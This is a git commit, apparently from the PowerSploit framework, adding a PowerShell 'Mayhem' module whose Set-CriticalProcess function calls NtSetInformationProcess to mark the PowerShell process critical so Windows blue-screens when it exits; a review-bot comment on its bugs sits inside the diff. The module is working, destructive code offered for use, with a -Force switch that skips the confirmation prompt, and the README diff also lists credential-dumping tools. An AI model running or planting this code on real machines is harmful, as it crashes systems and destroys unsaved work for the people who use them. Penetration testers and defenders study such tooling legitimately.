Adding Mayhem module and Set-CriticalProcess

This commit is contained in:
mattifestation 2014-06-19 20:28:50 -04:00
parent 80ffa19fa3
commit 29a5d48c3f
4 changed files with 206 additions and 0 deletions

87
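--- /dev/null
+++ b/Mayhem/Mayhem.psd1
@@ -0,0 +1,87 @@
+@{
+# Script module or binary module file associated with this manifest.
+ModuleToProcess = 'Mayhem.psm1'
+# Version number of this module.
+ModuleVersion = '1.0.0.0'
+# ID used to uniquely identify this module
+GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c'
+# Author of this module
+Author = 'Matthew Graeber'
+# Company or vendor of this module
+CompanyName = ''
+# Copyright statement for this module
+Copyright = 'BSD 3-Clause'
+# Description of the functionality provided by this module
+Description = 'PowerSploit Mayhem Module'
+# Minimum version of the Windows PowerShell engine required by this module
+PowerShellVersion = '2.0'
+# Name of the Windows PowerShell host required by this module
+# PowerShellHostName = ''
+# Minimum version of the Windows PowerShell host required by this module
+# PowerShellHostVersion = ''
+# Minimum version of the .NET Framework required by this module
+# DotNetFrameworkVersion = ''
+# Minimum version of the common language runtime (CLR) required by this module
+# CLRVersion = ''
+# Processor architecture (None, X86, Amd64) required by this module
+# ProcessorArchitecture = ''
+# Modules that must be imported into the global environment prior to importing this module
+# RequiredModules = @()
+# Assemblies that must be loaded prior to importing this module
+# RequiredAssemblies = @()
+# Script files (.ps1) that are run in the caller's environment prior to importing this module.
+# ScriptsToProcess = ''
+# Type files (.ps1xml) to be loaded when importing this module
+# TypesToProcess = @()
+# Format files (.ps1xml) to be loaded when importing this module
+# FormatsToProcess = @()
+# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
+# NestedModules = @()
+# Functions to export from this module
+FunctionsToExport = '*'
+# Cmdlets to export from this module
+CmdletsToExport = '*'
+# Variables to export from this module
+VariablesToExport = ''
+# Aliases to export from this module
+AliasesToExport = ''
+# List of all modules packaged with this module.
+ModuleList = @(@{ModuleName = 'Mayhem'; ModuleVersion = '1.0.0.0'; GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c'})
+# List of all files packaged with this module
+FileList = 'Mayhem.psm1', 'Mayhem.psd1', 'Usage.md'
+# Private data to pass to the module specified in RootModule/ModuleToProcess
+# PrivateData = ''
+# HelpInfo URI of this module
+# HelpInfoURI = ''
+# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
+# DefaultCommandPrefix = ''
+}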
99
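--- /dev/null
+++ b/Mayhem/Mayhem.psm1
@@ -0,0 +1,99 @@
+function Set-CriticalProcess
+{
+<#
+.SYNOPSIS
+Causes your machine to blue screen upon exiting PowerShell.
+PowerSploit Function: Set-CriticalProcess
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+.PARAMETER ExitImmediately
+Immediately exit PowerShell after successfully marking the process as critical.
+.PARAMETER Force
+Set the running PowerShell process as critical without asking for confirmation.
+.EXAMPLE
+Set-CriticalProcess
+.EXAMPLE
+Set-CriticalProcess -ExitImmediately
+.EXAMPLE
+Set-CriticalProcess -Force -Verbose
+#>
+[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param (
+[Switch]
+$Force,
+[Switch]
+$ExitImmediately
+)
+if (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))
+{
+throw 'You must run Set-CriticalProcess from an elevated PowerShell prompt.'
+}
+$Response = $True
+if (!$Force)
+{
+$Response = $psCmdlet.ShouldContinue('Have you saved all your work?', 'The machine will blue screen when you exit PowerShell.')
+}
+if (!$Response)
+{
+return
+}
+$DynAssembly = New-Object System.Reflection.AssemblyName('BlueScreen')
+$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
+$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BlueScreen', $False)
+# Define [ntdll]::NtQuerySystemInformation method
+$TypeBuilder = $ModuleBuilder.DefineType('BlueScreen.Win32.ntdll', 'Public, Class')
+$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('NtSetInformationProcess',
+'ntdll.dll',
+([Reflection.MethodAttributes] 'Public, Static'),
+[Reflection.CallingConventions]::Standard,
+[Int32],
+[Type[]] @([IntPtr], [UInt32], [IntPtr].MakeByRefType(), [UInt32]),
+[Runtime.InteropServices.CallingConvention]::Winapi,
+[Runtime.InteropServices.CharSet]::Auto)
+$ntdll = $TypeBuilder.CreateType()
+$ProcHandle = [Diagnostics.Process]::GetCurrentProcess().Handle
+$ReturnPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(4)
+$ProcessBreakOnTermination = 29
+$SizeUInt32 = 4
+try
+{
+$null = $ntdll::NtSetInformationProcess($ProcHandle, $ProcessBreakOnTermination, [Ref] $ReturnPtr, $SizeUInt32)
+}
+catch
+{
+return
+}
+Write-Verbose 'PowerShell is now marked as a critical process and will blue screen the machine upon exiting the process.'
+if ($ExitImmediately)
+{
+Stop-Process -Id $PID
+}
+}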
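Review bot: The NTSTATUS returned by NtSetInformationProcess is discarded (`$null = $ntdll::NtSetInformationProcess(...)`), so when the call fails the function still reports via Write-Verbose that the process is critical and, with -ExitImmediately, stops the process regardless; capture it and bail out on a non-zero status, e.g. `$Status = $ntdll::NtSetInformationProcess(...)` followed by `if ($Status -ne 0) { throw ('NtSetInformationProcess failed with NTSTATUS 0x{0:X8}' -f $Status) }`. The `catch { return }` block likewise hides the reason for a failed P/Invoke; rethrowing or calling Write-Error would let the caller see it. The comment above DefineType reads `# Define [ntdll]::NtQuerySystemInformation method` but the method defined is NtSetInformationProcess; it should read `# Define [ntdll]::NtSetInformationProcess method`. The attribute declares SupportsShouldProcess but $PSCmdlet.ShouldProcess is never called, so `-WhatIf` does not prevent the process from being marked critical; wrapping the call in `if ($PSCmdlet.ShouldProcess($PID, 'Mark process as critical'))` would honour it. The buffer from AllocHGlobal(4) is never released with FreeHGlobal.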

12
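--- /dev/null
+++ b/Mayhem/Usage.md
@@ -0,0 +1,12 @@
+To install this module, drop the entire Mayhem folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
+The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
+The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
+To use the module, type `Import-Module Mayhem`
+To see the commands imported, type `Get-Command -Module Mayhem`
+For help on each individual command, Get-Help is your friend.
+Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.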

@ -196,6 +196,14 @@ Displays Windows vault credential objects including cleartext web credentials.
Generates a full-memory minidump of a process. Generates a full-memory minidump of a process.
## Mayhem
**Cause general mayhem with PowerShell.**
#### `Set-CriticalProcess`
Causes your machine to blue screen upon exiting PowerShell.
## Recon ## Recon
**Tools to aid in the reconnaissance phase of a penetration test.** **Tools to aid in the reconnaissance phase of a penetration test.**